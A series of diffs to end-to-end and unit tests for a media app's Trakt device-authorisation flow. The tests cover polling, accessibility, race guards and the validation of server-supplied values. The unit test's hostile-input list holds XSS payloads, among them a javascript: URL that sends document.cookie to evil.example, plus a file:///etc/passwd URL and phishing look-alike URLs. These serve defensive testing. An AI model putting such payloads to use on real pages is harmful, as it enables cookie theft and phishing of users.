+    await page.route(DEVICE_CODE_ROUTE, (route) => {
+      deviceCodeRequests++;
+      return route.fulfill(deviceCodeResponse());
+    });
+    // Never resolves in this test: asserts only the code/URL display step.
+    await page.route(POLL_ROUTE, (route) => route.fulfill(pollPendingResponse(30)));
+
+    await startButton.click();
+
+    // The code and the verification link land INSIDE the live region, not
+    // merely somewhere on the page -- so a mutation to this element is what
+    // a screen reader is asked to announce.
+    await expect(status).toContainText('ABCD-1234');
+    const codeEl = status.locator('[data-testid="trakt-user-code"]');
+    await expect(codeEl).toHaveText('ABCD-1234');
+
+    const link = status.locator('[data-testid="trakt-verification-url"]');
+    await expect(link).toHaveAttribute('href', 'https://trakt.tv/activate');
+    await expect(link).toHaveAttribute('target', '_blank');
+    await expect(link).toHaveAttribute('rel', /noopener/);
+
+    expect(deviceCodeRequests).toBe(1);
+
+    // Re-entry guard: the button is aria-disabled (not disabled) while
+    // polling is live, so it stays keyboard-focusable but a click while
+    // polling must not fire a second device_code request.
+    await expect(startButton).toHaveAttribute('aria-disabled', 'true');
+    await startButton.click({ force: true });
+    expect(deviceCodeRequests).toBe(1);
+  });
+
+  test('a pending poll response keeps the control polling', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+    const status = page.locator('[data-testid="trakt-auth-status"]');
+
+    await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse({ interval: 1 })));
+
+    let pollRequests = 0;
+    await page.route(POLL_ROUTE, (route) => {
+      pollRequests++;
+      return route.fulfill(pollPendingResponse(1));
+    });
+
+    await startButton.click();
+    await expect(status).toContainText('ABCD-1234');
+
+    // At least three polls within a few seconds proves the loop keeps
+    // going on `pending: true` rather than firing once and stopping.
+    await expect.poll(() => pollRequests, { timeout: 8000 }).toBeGreaterThanOrEqual(3);
+
+    // Still displaying the code and still marked busy -- pending is not a
+    // terminal state.
+    await expect(status).toContainText('ABCD-1234');
+    await expect(startButton).toHaveAttribute('aria-disabled', 'true');
+  });
+
+  test('a successful poll reports success and refreshes the settings panel', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+    const status = page.locator('[data-testid="trakt-auth-status"]');
+
+    await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse({ interval: 1 })));
+
+    let pollRequests = 0;
+    await page.route(POLL_ROUTE, (route) => {
+      pollRequests++;
+      return route.fulfill(pollSuccessResponse());
+    });
+
+    let settingsReloads = 0;
+    await page.route('**/settings/', async (route) => {
+      settingsReloads++;
+      await route.continue();
+    });
+
+    await startButton.click();
+    await expect(status).toContainText('ABCD-1234');
+
+    await expect(status).toContainText('Authorization successful! Trakt is now connected.', { timeout: 8000 });
+    // The device code is no longer relevant once authorisation succeeded.
+    await expect(status).not.toContainText('ABCD-1234');
+    expect(pollRequests).toBeGreaterThanOrEqual(1);
+
+    // buttonField.execute()'s re-init approach: panel.init() re-fetches
+    // /settings/ so the (now-populated) token fields reflect what the
+    // server actually stored, rather than the stale pre-auth values.
+    await expect.poll(() => settingsReloads, { timeout: 5000 }).toBeGreaterThanOrEqual(1);
+
+    // Polling has stopped and the control is free to be used again.
+    await expect(startButton).toHaveAttribute('aria-disabled', 'false');
+  });
+
+  test('an error poll response reports the error and stops polling', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+    const status = page.locator('[data-testid="trakt-auth-status"]');
+
+    let deviceCodeRequests = 0;
+    await page.route(DEVICE_CODE_ROUTE, (route) => {
+      deviceCodeRequests++;
+      return route.fulfill(deviceCodeResponse({ interval: 1 }));
+    });
+
+    let pollRequests = 0;
+    await page.route(POLL_ROUTE, (route) => {
+      pollRequests++;
+      return route.fulfill(pollErrorResponse('Device code expired. Please start authorization again.'));
+    });
+
+    await startButton.click();
+    await expect(status).toContainText('ABCD-1234');
+
+    await expect(status).toContainText('Device code expired. Please start authorization again.', { timeout: 8000 });
+    await expect(status).not.toContainText('ABCD-1234');
+
+    const requestsAtError = pollRequests;
+    expect(requestsAtError).toBeGreaterThanOrEqual(1);
+
+    // Polling stopped: no further poll_token calls arrive after the error.
+    await page.waitForTimeout(2500);
+    expect(pollRequests).toBe(requestsAtError);
+
+    // The control is usable again -- the user can start over, which begins
+    // a fresh device_code call rather than resuming the dead poll loop.
+    // (The mocked poll_token route still errors immediately, so the retry
+    // is asserted by its request counts, not by the code staying on
+    // screen -- it is cleared again the moment the second poll errors,
+    // which is correct behaviour, not something to race against.)
+    await expect(startButton).toHaveAttribute('aria-disabled', 'false');
+    expect(deviceCodeRequests).toBe(1);
+    await startButton.click();
+    await expect.poll(() => deviceCodeRequests, { timeout: 5000 }).toBe(2);
+    await expect.poll(() => pollRequests, { timeout: 5000 }).toBeGreaterThanOrEqual(requestsAtError + 1);
+  });
+});

--- a/tests/e2e/trakt-device-auth.spec.ts
+++ b/tests/e2e/trakt-device-auth.spec.ts
@@ -293,6 +293,47 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     await expect.poll(() => pollRequests, { timeout: 8000 }).toBeGreaterThanOrEqual(1);
   });
 
+  test('a double click starts ONE authorisation, not two (the guard covers its own await)', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+
+    // The re-entry guard has to be claimed synchronously. If the flag is set
+    // after the credential flush, the guard is a no-op across a real network
+    // round trip, and a double click, which is an ordinary thing to do and
+    // exactly the case the flush exists for, puts two runs on the same
+    // component: each overwrites userCode and pollTimer, orphaning whichever
+    // poll loop loses. That is the concurrent-loop defect this control was
+    // fixed for, one step earlier in the same function.
+    let deviceCodeRequests = 0;
+    await page.route(DEVICE_CODE_ROUTE, async (route) => {
+      deviceCodeRequests++;
+      return route.fulfill(deviceCodeResponse({ interval: 30 }));
+    });
+    await page.route(POLL_ROUTE, (route) => route.fulfill(pollPendingResponse(30)));
+
+    // Type first, so a real flush (a fetch, not a microtask hop) sits inside
+    // start() and the window is genuinely open.
+    const secretField = page.getByLabel('Client Secret', { exact: true });
+    await expect(secretField).toBeVisible({ timeout: 10000 });
+    await secretField.fill('typed-just-now-secret');
+
+    // Both clicks dispatched in ONE synchronous block. Playwright's second
+    // .click() would wait for the element to be "stable", which the spinner
+    // animation prevents, so it cannot express a double click on this control
+    // at all: the test would time out on actionability rather than measure
+    // the race. Dispatching directly is what a real double click does anyway.
+    await page.evaluate(() => {
+      const b = document.querySelector('[data-testid="trakt-start-auth"]') as HTMLElement;
+      b.click();
+      b.click();
+    });
+
+    await expectCodeShown(page);
+    // Read after a bounded wait, not at the click: a second request that has
+    // not been issued yet is indistinguishable from one that never will be.
+    await page.waitForTimeout(1500);
+    expect(deviceCodeRequests).toBe(1);
+  });
+
   test('a credential typed a moment ago is saved before authorisation starts', async ({ page }) => {
     const startButton = await openTraktGroup(page);
 

--- a/tests/e2e/trakt-device-auth.spec.ts
+++ b/tests/e2e/trakt-device-auth.spec.ts
@@ -187,8 +187,17 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     });
 
     await startButton.click();
-    await expect(status).toContainText('ABCD-1234');
 
+    // Deliberately NOT asserting the device code appears here. It is only on
+    // screen between device_code returning and the first poll succeeding, and
+    // this test's mock answers that poll with success immediately, so the
+    // window is vanishingly small. That assertion passed when this spec ran
+    // alone and failed inside the full gate on a loaded machine, which is the
+    // worst kind of test: green until it matters.
+    // The code display has its own test above ('starting authorisation
+    // displays the code and URL...'), which mocks a PENDING poll on a 30s
+    // interval so the code is genuinely stable while it is asserted. This test
+    // is about the success path, so it asserts only that.
     await expect(status).toContainText('Authorization successful! Trakt is now connected.', { timeout: 8000 });
     // The device code is no longer relevant once authorisation succeeded.
     await expect(status).not.toContainText('ABCD-1234');

--- a/tests/e2e/trakt-device-auth.spec.ts
+++ b/tests/e2e/trakt-device-auth.spec.ts
@@ -500,6 +500,46 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     await expect.poll(() => pollRequests, { timeout: 5000 }).toBeGreaterThanOrEqual(requestsAtError + 1);
   });
 
+  test('leaving within the refresh delay after success does not refetch settings on a dead component', async ({ page }) => {
+    const startButton = await openTraktGroup(page);
+
+    // finish() schedules a panel re-init 500ms after success, so the newly
+    // stored token fields render. Leaving the tab inside that window used to
+    // fire it on a torn-down component: a settings refetch nobody asked for,
+    // landing on whichever tab the user had moved to, plus a duplicate
+    // watcher. It is the one timer whose callback does NOT re-check the run
+    // itself, so later() is its only guard.
+    await page.route(DEVICE_CODE_ROUTE, (route) =>
+      route.fulfill(deviceCodeResponse({ interval: 1 })));
+    await page.route(POLL_ROUTE, (route) => route.fulfill(pollSuccessResponse()));
+
+    // '**/settings/' is what panel.init() actually fetches. An earlier draft
+    // of this test matched settings.all|settings.view, which nothing
+    // requests, so the counter stayed at zero and the assertion below could
+    // not fail no matter what the code did.
+    let settingsReloads = 0;
+    await page.route('**/settings/', async (route) => {
+      settingsReloads++;
+      await route.continue();
+    });
+
+    await startButton.click();
+    const message = page.locator('[data-testid="trakt-auth-message"]');
+    await expect(message).toBeVisible({ timeout: 8000 });
+    await expect(message).toContainText('Authorisation successful');
+
+    // Leave immediately, well inside the 500ms refresh delay.
+    const reloadsAtDeparture = settingsReloads;
+    await page.getByRole('tab', { name: /general/i }).click();
+    await expect(page.locator('[data-testid="trakt-start-auth"]')).toHaveCount(0);
+
+    // Read after the delay has comfortably passed, not at the instant of
+    // leaving: a refetch that has not happened yet looks the same as one
+    // that never will.
+    await page.waitForTimeout(1500);
+    expect(settingsReloads).toBe(reloadsAtDeparture);
+  });
+
   test('H1: navigating away mid-poll stops the poll loop instead of orphaning it', async ({ page }) => {
     // Regression pin for the security review's H1: switching settings tabs
     // tears down this group's x-data (settings.html's x-for is keyed on

--- a/tests/e2e/trakt-device-auth.spec.ts
+++ b/tests/e2e/trakt-device-auth.spec.ts
@@ -98,6 +98,23 @@ async function openTraktGroup(page: Page) {
   return startButton;
 }
 
+/**
+ * The only sanctioned way to assert that the device code is on screen.
+ *
+ * `expect(status).toContainText('ABCD-1234')` reads textContent from the
+ * region wrapper, which is present whether or not the code box is displayed.
+ * Setting the box to never display, so nobody could read the code they are
+ * told to type in, left every spec in this file green, twice, in two
+ * different rounds. Visibility on the code element itself is the assertion
+ * that can actually fail, and `scripts/check_test_traps.py` now enforces
+ * that any text assertion on these ids is paired with one.
+ */
+async function expectCodeShown(page: Page) {
+  const code = page.locator('[data-testid="trakt-user-code"]');
+  await expect(code).toBeVisible({ timeout: 8000 });
+  await expect(code).toContainText('ABCD-1234');
+}
+
 test.describe('Trakt device authorisation (FEAT #311)', () => {
   // L2: both endpoints are mocked per test below, which is discipline, not a
   // guard -- a forgotten mock (or a future edit that calls Trakt directly
@@ -151,21 +168,43 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     // The point of the test: the region a screen reader is listening to says
     // something while we are waiting. The button's own label also changes,
     // but that is only read if focus happens to be on the button.
-    await expect(status).toContainText('Contacting Trakt', { timeout: 8000 });
+    // toBeVisible on the message element itself, not toContainText on the
+    // region: textContent is present while hidden, so text alone cannot
+    // tell a working announcement from one nobody can see.
+    const message = page.locator('[data-testid="trakt-auth-message"]');
+    await expect(message).toBeVisible({ timeout: 8000 });
+    await expect(message).toContainText('Contacting Trakt');
 
     release();
-    await expect(status).toContainText('ABCD-1234', { timeout: 8000 });
+    await expectCodeShown(page);
   });
 
-  test('the button points at the status region, so its unavailable state has a reason (WCAG 1.3.1)', async ({ page }) => {
+  test('the button says what it is doing while it waits, in its NAME (WCAG 4.1.2)', async ({ page }) => {
     const startButton = await openTraktGroup(page);
 
-    // aria-disabled without aria-describedby reads as "unavailable" with the
-    // reason sitting in an unassociated element, for up to the full ten
-    // minute poll window.
-    const describedBy = await startButton.getAttribute('aria-describedby');
-    expect(describedBy).toBe('trakt-auth-status');
-    await expect(page.locator(`#${describedBy}`)).toHaveAttribute('role', 'status');
+    // The state has to be in the accessible NAME, not only in a description.
+    // Pointing aria-describedby at the whole live region made every focus
+    // read the verification URL and the code aloud again for the rest of the
+    // session; and leaving the label as "Start Trakt Authorisation" for the
+    // entire ten minute wait meant a sighted user saw a greyed-out control
+    // labelled Start that would not start.
+    await expect(startButton).toHaveAccessibleName('Start Trakt Authorisation');
+    expect(await startButton.getAttribute('aria-describedby')).toBeNull();
+
+    await page.route(DEVICE_CODE_ROUTE, (route) =>
+      route.fulfill(deviceCodeResponse({ interval: 30 })));
+    await page.route(POLL_ROUTE, (route) => route.fulfill(pollPendingResponse(30)));
+
+    await startButton.click();
+    await expectCodeShown(page);
+
+    await expect(startButton).toHaveAccessibleName('Waiting for Trakt…');
+    await expect(startButton).toHaveAttribute('aria-disabled', 'true');
+    // Still reachable: aria-disabled, not disabled, so it keeps its place in
+    // the tab order. That is precisely why it must not be dimmed, and why
+    // this test exists next to the contrast expectations.
+    await startButton.focus();
+    await expect(startButton).toBeFocused();
   });
 
   test('starting authorisation displays the code and URL inside a persistent live region', async ({ page }) => {
@@ -193,7 +232,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     // The code and the verification link land INSIDE the live region, not
     // merely somewhere on the page -- so a mutation to this element is what
     // a screen reader is asked to announce.
-    await expect(status).toContainText('ABCD-1234');
+    await expectCodeShown(page);
     const codeEl = status.locator('[data-testid="trakt-user-code"]');
     await expect(codeEl).toHaveText('ABCD-1234');
     // VISIBLE, not merely present. toHaveText and toContainText read
@@ -237,7 +276,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     });
 
     await startButton.click();
-    await expect(status).toContainText('ABCD-1234');
+    await expectCodeShown(page);
 
     // At least three polls within a few seconds proves the loop keeps
     // going on `pending: true` rather than firing once and stopping.
@@ -245,7 +284,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
 
     // Still displaying the code and still marked busy -- pending is not a
     // terminal state.
-    await expect(status).toContainText('ABCD-1234');
+    await expectCodeShown(page);
     await expect(startButton).toHaveAttribute('aria-disabled', 'true');
   });
 
@@ -279,7 +318,9 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     // displays the code and URL...'), which mocks a PENDING poll on a 30s
     // interval so the code is genuinely stable while it is asserted. This test
     // is about the success path, so it asserts only that.
-    await expect(status).toContainText('Authorisation successful! Trakt is now connected.', { timeout: 8000 });
+    const message = page.locator('[data-testid="trakt-auth-message"]');
+    await expect(message).toBeVisible({ timeout: 8000 });
+    await expect(message).toContainText('Authorisation successful! Trakt is now connected.');
     // The device code is no longer relevant once authorisation succeeded.
     await expect(status).not.toContainText('ABCD-1234');
     expect(pollRequests).toBeGreaterThanOrEqual(1);
@@ -319,7 +360,9 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     // just under gate load. The code display has its own stable-window test
     // above, which mocks a PENDING poll on a 30s interval. This test is
     // about the error path, so it asserts only that.
-    await expect(status).toContainText('Device code expired. Please start authorisation again.', { timeout: 8000 });
+    const message = page.locator('[data-testid="trakt-auth-message"]');
+    await expect(message).toBeVisible({ timeout: 8000 });
+    await expect(message).toContainText('Device code expired. Please start authorisation again.');
     await expect(status).not.toContainText('ABCD-1234');
 
     const requestsAtError = pollRequests;
@@ -365,7 +408,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     });
 
     await startButton.click();
-    await expect(status).toContainText('ABCD-1234');
+    await expectCodeShown(page);
 
     // Arm the counter and let at least one real poll land before the trigger,
     // so the wait below is measuring the loop stopping, not merely a request
@@ -424,7 +467,7 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     });
 
     await startButton.click();
-    await expect(status).toContainText('ABCD-1234');
+    await expectCodeShown(page);
     await expect.poll(() => pollRequests, { timeout: 5000 }).toBe(2);
 
     // Tear the component down while poll #2 is still open.

--- a/tests/e2e/trakt-device-auth.spec.ts
+++ b/tests/e2e/trakt-device-auth.spec.ts
@@ -99,6 +99,35 @@ async function openTraktGroup(page: Page) {
 }
 
 test.describe('Trakt device authorisation (FEAT #311)', () => {
+  // L2: both endpoints are mocked per test below, which is discipline, not a
+  // guard -- a forgotten mock (or a future edit that calls Trakt directly
+  // from the browser) must fail loudly rather than making a real, slow
+  // outbound call during a test run.
+  test.beforeEach(async ({ page }) => {
+    await page.route('**://api.trakt.tv/**', (route) => route.abort());
+  });
+
+  test('L2: a browser-issued call to the real Trakt API is blocked rather than reaching the network', async ({ page }) => {
+    // Both specs mock CouchPotato's own device_code/poll_token routes per
+    // test, but that is discipline, not a guard -- nothing stops a future
+    // edit (or a test that forgets to mock) from making the browser talk to
+    // Trakt directly. This pins the beforeEach guard below: it must turn a
+    // real outbound call into a loud, immediate failure rather than a slow
+    // real network round trip inside a test run.
+    await page.goto('/settings/');
+
+    const outcome = await page.evaluate(async () => {
+      try {
+        await fetch('https://api.trakt.tv/oauth/device/code', { method: 'POST' });
+        return 'reached-the-network';
+      } catch (e) {
+        return 'blocked: ' + (e as Error).message;
+      }
+    });
+
+    expect(outcome).not.toBe('reached-the-network');
+  });
+
   test('starting authorisation displays the code and URL inside a persistent live region', async ({ page }) => {
     const startButton = await openTraktGroup(page);
 
@@ -229,8 +258,15 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     });
 
     await startButton.click();
-    await expect(status).toContainText('ABCD-1234');
 
+    // Deliberately NOT asserting the device code appears here, same
+    // reasoning as the success test above (217872c0c): this test's mock
+    // answers the poll with an error immediately, so the window where
+    // 'ABCD-1234' is on screen before showError() clears it is often too
+    // short to land -- reproduced failing 2 of 5 runs in isolation, not
+    // just under gate load. The code display has its own stable-window test
+    // above, which mocks a PENDING poll on a 30s interval. This test is
+    // about the error path, so it asserts only that.
     await expect(status).toContainText('Device code expired. Please start authorization again.', { timeout: 8000 });
     await expect(status).not.toContainText('ABCD-1234');
 
@@ -252,5 +288,52 @@ test.describe('Trakt device authorisation (FEAT #311)', () => {
     await startButton.click();
     await expect.poll(() => deviceCodeRequests, { timeout: 5000 }).toBe(2);
     await expect.poll(() => pollRequests, { timeout: 5000 }).toBeGreaterThanOrEqual(requestsAtError + 1);
+  });
+
+  test('H1: navigating away mid-poll stops the poll loop instead of orphaning it', async ({ page }) => {
+    // Regression pin for the security review's H1: switching settings tabs
+    // tears down this group's x-data (settings.html's x-for is keyed on
+    // currentGroups, which is recomputed on tab change and no longer
+    // includes this group), but the pending setTimeout inside poll() used
+    // to survive the teardown because clearPoll() was only ever called
+    // from start()/showSuccess()/showError(). A second "Start Authorisation"
+    // click back on this tab then raced the orphaned chain: whichever one
+    // consumed the device code on trakt.tv's side succeeded, and the other
+    // read back "No device code. Start authorization first." -- reporting
+    // failure to a user whose authorisation had actually succeeded.
+    const startButton = await openTraktGroup(page);
+    const status = page.locator('[data-testid="trakt-auth-status"]');
+
+    await page.route(DEVICE_CODE_ROUTE, (route) => route.fulfill(deviceCodeResponse({ interval: 1 })));
+
+    let pollRequests = 0;
+    await page.route(POLL_ROUTE, (route) => {
+      pollRequests++;
+      return route.fulfill(pollPendingResponse(1));
+    });
+
+    await startButton.click();
+    await expect(status).toContainText('ABCD-1234');
+
+    // Arm the counter and let at least one real poll land before the trigger,
+    // so the wait below is measuring the loop stopping, not merely a request
+    // that was already in flight.
+    await expect.poll(() => pollRequests, { timeout: 5000 }).toBeGreaterThanOrEqual(1);
+
+    // Navigate away: switch to a different settings tab, which removes this
+    // group from currentGroups and tears its component down.
+    const generalTab = page.getByRole('tab', { name: /^general$/i });
+    await generalTab.click();
+    await expect(page.locator('[data-testid="trakt-start-auth"]')).not.toBeAttached();
+
+    const countAtNavigation = pollRequests;
+
+    // Wait long enough for at least two more 1s poll intervals to have
+    // elapsed. Read only after the bounded wait, not at the same instant as
+    // the navigation -- a request already in flight at navigation time would
+    // otherwise be misread as the loop continuing.
+    await page.waitForTimeout(3000);
+
+    expect(pollRequests).toBe(countAtNavigation);
   });
 });

--- a/tests/unit/test_trakt_device_auth.py
+++ b/tests/unit/test_trakt_device_auth.py
@@ -1,0 +1,265 @@
+"""H2/M1: the Trakt device-auth flow trusted whatever the Trakt API sent back.
+
+Two problems, both fixed in `startDeviceAuth`/`pollForToken` rather than in
+the browser, because that is the layer both share:
+
+M1 -- `interval` and `expires_in` came straight off the wire into the client
+poll loop. Driving the client component's source directly (not this test --
+recorded here for context) with `interval: -1` produced 605 poll requests in
+3 seconds and `interval: 1e9` (which overflows `setTimeout`'s 32-bit
+millisecond limit and so fires immediately) produced 609. Each poll takes a
+per-route lock (`couchpotato/api.py`) and makes a blocking 30 second outbound
+HTTPS call from the server's thread pool, so a hostile or malformed response
+can queue the whole server within about a second.
+
+H2 -- `verification_url` was returned untouched and bound with `:href` in
+`trakt_auth.html`. The vendored Alpine does no scheme filtering on `x-bind`,
+and there is no CSP, so a `javascript:` URL in that field is clickable
+script. Requires a compromised Trakt response or TLS interception to
+exploit, but the fix is one line at the layer that already validates
+everything else.
+
+This drives the REAL `startDeviceAuth` and `pollForToken` methods -- not a
+reimplementation of the clamp logic -- with `requests.post` patched to
+return crafted hostile responses, and asserts both the dict handed back to
+the browser AND the instance state used on the next poll (`_poll_interval`,
+`_device_expires`) land inside the documented bounds. A test that only
+checked the returned dict could pass while the stored state still let a
+poll happen every microsecond.
+"""
+import math
+import sys
+import time
+from pathlib import Path
+
+import pytest
+
+pytestmark = pytest.mark.unit
+
+sys.path.insert(0, str(Path(__file__).resolve().parent))
+
+from env_helper import env_restored  # noqa: E402
+
+from couchpotato.core.media.movie.providers.automation.trakt import main as trakt_main  # noqa: E402
+
+MISSING = object()
+
+
+class _FakeResponse:
+    """Stand-in for `requests.Response` -- only what the provider reads."""
+
+    def __init__(self, status_code=200, json_data=None, text=''):
+        self.status_code = status_code
+        self._json_data = json_data if json_data is not None else {}
+        self.text = text
+
+    def json(self):
+        return self._json_data
+
+
+@pytest.fixture
+def provider(monkeypatch):
+    """A real `Trakt` instance, built without running `__init__` (which
+    registers API views and a scheduled job neither test needs -- same
+    approach `test_trakt_notifier_credentials.py` uses), with just enough
+    wired up to reach the code under test: a configured client id/secret
+    (not what this test is about) and clean device-auth state."""
+    with env_restored():
+        provider = trakt_main.Trakt.__new__(trakt_main.Trakt)
+        provider._device_code = None
+        provider._device_expires = 0
+        provider._poll_interval = 5
+        monkeypatch.setattr(provider, 'get_client_id', lambda: 'test-client-id')
+        monkeypatch.setattr(provider, 'get_client_secret', lambda: 'test-client-secret')
+        yield provider
+
+
+def _mock_post(monkeypatch, response):
+    """Patch the actual `requests` module's `post`, since `main.py` does a
+    local `import requests` inside each method -- that binds the same
+    module object every caller shares, so patching the attribute on the
+    real module reaches it regardless of where it is imported."""
+    import requests
+    monkeypatch.setattr(requests, 'post', lambda *a, **k: response)
+
+
+class TestStartDeviceAuthClampsInterval:
+    """M1: a hostile or malformed `interval` must not reach the client, or
+    `_poll_interval` (read by the 429 slow-down path and handed back on the
+    next poll), outside 5..60 seconds inclusive."""
+
+    @pytest.mark.parametrize('raw_interval, expected', [
+        (-1, 5),                 # negative -> floor
+        (0, 5),                  # zero -> floor
+        (1e9, 60),                # overflows setTimeout's 32-bit ms limit -> ceiling
+        ('abc', 5),               # non-numeric -> default
+        (None, 5),                # explicit null -> default
+        (True, 5),                # bool is technically an int in Python; must not pass through as 1
+        (MISSING, 5),             # key absent entirely -> default
+        (float('nan'), 5),        # NaN -> default
+        (float('inf'), 5),        # infinity is not a usable number either -> default, same as NaN
+        (5, 5),                   # in range, lower bound -> unchanged
+        (60, 60),                 # in range, upper bound -> unchanged
+        (30, 30),                 # in range, middle -> unchanged
+    ])
+    def test_clamps_returned_and_stored_interval(self, provider, monkeypatch, raw_interval, expected):
+        payload = {
+            'device_code': 'devcode-1',
+            'user_code': 'ABCD-1234',
+            'verification_url': 'https://trakt.tv/activate',
+            'expires_in': 600,
+        }
+        if raw_interval is not MISSING:
+            payload['interval'] = raw_interval
+        _mock_post(monkeypatch, _FakeResponse(200, payload))
+
+        result = provider.startDeviceAuth()
+
+        assert result['success'] is True
+        assert result['interval'] == expected, (
+            f'startDeviceAuth() returned interval={result["interval"]!r} for '
+            f'raw interval {raw_interval!r}; expected it clamped to {expected}'
+        )
+        assert provider._poll_interval == expected, (
+            f'_poll_interval={provider._poll_interval!r} was not clamped for '
+            f'raw interval {raw_interval!r}; this is what the next poll and '
+            f'the 429 slow-down path both trust'
+        )
+
+
+class TestStartDeviceAuthClampsExpiry:
+    """M1: a hostile or malformed `expires_in` must not reach the client, or
+    `_device_expires`, outside 60..1800 seconds inclusive."""
+
+    @pytest.mark.parametrize('raw_expiry, expected', [
+        (-1, 60),
+        (0, 60),
+        (99999999, 1800),
+        ('abc', 600),
+        (None, 600),
+        (True, 600),
+        (MISSING, 600),
+        (float('nan'), 600),
+        (60, 60),
+        (1800, 1800),
+    ])
+    def test_clamps_returned_expiry_and_stored_deadline(self, provider, monkeypatch, raw_expiry, expected):
+        payload = {
+            'device_code': 'devcode-1',
+            'user_code': 'ABCD-1234',
+            'verification_url': 'https://trakt.tv/activate',
+            'interval': 5,
+        }
+        if raw_expiry is not MISSING:
+            payload['expires_in'] = raw_expiry
+        _mock_post(monkeypatch, _FakeResponse(200, payload))
+
+        before = time.time()
+        result = provider.startDeviceAuth()
+        after = time.time()
+
+        assert result['success'] is True
+        assert result['expires_in'] == expected, (
+            f'startDeviceAuth() returned expires_in={result["expires_in"]!r} for '
+            f'raw expiry {raw_expiry!r}; expected it clamped to {expected}'
+        )
+        # _device_expires is an absolute deadline (time.time() + expires_in),
+        # not the raw seconds value -- bound it against the call window.
+        assert before + expected <= provider._device_expires <= after + expected, (
+            f'_device_expires={provider._device_expires!r} is not '
+            f'time.time() + {expected} for raw expiry {raw_expiry!r}'
+        )
+
+
+class TestStartDeviceAuthRejectsUnsafeVerificationUrl:
+    """H2: `verification_url` is bound as an href with no scheme filtering
+    downstream, so anything other than a genuine https:// URL must be
+    replaced with the documented fallback."""
+
+    @pytest.mark.parametrize('hostile_url', [
+        'javascript:alert(document.cookie)',
+        'javascript:fetch("https://evil.example/steal?c="+document.cookie)',
+        'data:text/html,<script>alert(1)</script>',
+        'http://trakt.tv/activate',
+        '//evil.example/activate',
+        'file:///etc/passwd',
+        '',
+        None,
+        123,
+    ])
+    def test_falls_back_to_documented_url(self, provider, monkeypatch, hostile_url):
+        payload = {
+            'device_code': 'devcode-1',
+            'user_code': 'ABCD-1234',
+            'expires_in': 600,
+            'interval': 5,
+        }
+        if hostile_url is not MISSING:
+            payload['verification_url'] = hostile_url
+        _mock_post(monkeypatch, _FakeResponse(200, payload))
+
+        result = provider.startDeviceAuth()
+
+        assert result['success'] is True
+        assert result['verification_url'] == 'https://trakt.tv/activate', (
+            f'startDeviceAuth() returned verification_url='
+            f'{result["verification_url"]!r} for hostile input {hostile_url!r}; '
+            f'a value that is not https:// is clickable script/local-file '
+            f'access once bound with :href in trakt_auth.html'
+        )
+
+    def test_a_genuine_https_url_passes_through_unchanged(self, provider, monkeypatch):
+        payload = {
+            'device_code': 'devcode-1',
+            'user_code': 'ABCD-1234',
+            'verification_url': 'https://trakt.tv/activate?user_code=ABCD-1234',
+            'expires_in': 600,
+            'interval': 5,
+        }
+        _mock_post(monkeypatch, _FakeResponse(200, payload))
+
+        result = provider.startDeviceAuth()
+
+        assert result['verification_url'] == 'https://trakt.tv/activate?user_code=ABCD-1234'
+
+
+class TestPollForTokenSlowDownClampsInterval:
+    """The 429 slow-down path doubles `_poll_interval`; that arithmetic must
+    stay inside the same 5..60 bound as the initial value, not the old
+    hardcoded 30-second cap (and not unbounded growth)."""
+
+    @pytest.mark.parametrize('starting_interval, expected_after_one_429', [
+        (5, 10),
+        (40, 60),   # doubling would overshoot 60 -- clamp to the ceiling
+        (60, 60),   # already at the ceiling -- stays there
+    ])
+    def test_slow_down_stays_within_bounds(
+        self, provider, monkeypatch, starting_interval, expected_after_one_429,
+    ):
+        provider._device_code = 'devcode-1'
+        provider._device_expires = time.time() + 300
+        provider._poll_interval = starting_interval
+        _mock_post(monkeypatch, _FakeResponse(429, {}))
+
+        result = provider.pollForToken()
+
+        assert result['pending'] is True
+        assert result['interval'] == expected_after_one_429
+        assert provider._poll_interval == expected_after_one_429
+        assert 5 <= provider._poll_interval <= 60
+
+
+class TestPollForTokenRequiresDeviceCode:
+    """Control: the pre-existing 'no device code' guard must still fire when
+    there genuinely is none -- proves the clamping changes above did not
+    loosen this unrelated check."""
+
+    def test_no_device_code_is_still_rejected(self, provider, monkeypatch):
+        provider._device_code = None
+        # No mocked transport call should even be reached.
+        _mock_post(monkeypatch, _FakeResponse(200, {'access_token': 'should-not-be-used'}))
+
+        result = provider.pollForToken()
+
+        assert result['success'] is False
+        assert 'device code' in result['error'].lower()

--- a/tests/unit/test_trakt_device_auth.py
+++ b/tests/unit/test_trakt_device_auth.py
@@ -186,6 +186,19 @@ class TestStartDeviceAuthRejectsUnsafeVerificationUrl:
         '',
         None,
         123,
+        # Host pinning. A scheme check alone stops a forged response becoming
+        # clickable script, not it becoming a phishing page: these are all
+        # genuine https:// URLs, and a user sent to one would type a real
+        # device code into an attacker's page dressed as trakt.tv/activate.
+        'https://evil.example/activate',
+        'https://trakt.tv.evil.example/activate',
+        'https://nottrakt.tv/activate',
+        'https://eviltrakt.tv/activate',
+        'https://evil.example/?x=https://trakt.tv/activate',
+        # Userinfo, which puts the real host after the @ and is the classic
+        # way to make a hostile URL read as a friendly one.
+        'https://trakt.tv@evil.example/activate',
+        'https://trakt.tv:pass@evil.example/activate',
     ])
     def test_falls_back_to_documented_url(self, provider, monkeypatch, hostile_url):
         payload = {
@@ -204,8 +217,9 @@ class TestStartDeviceAuthRejectsUnsafeVerificationUrl:
         assert result['verification_url'] == 'https://trakt.tv/activate', (
             f'startDeviceAuth() returned verification_url='
             f'{result["verification_url"]!r} for hostile input {hostile_url!r}; '
-            f'a value that is not https:// is clickable script/local-file '
-            f'access once bound with :href in trakt_auth.html'
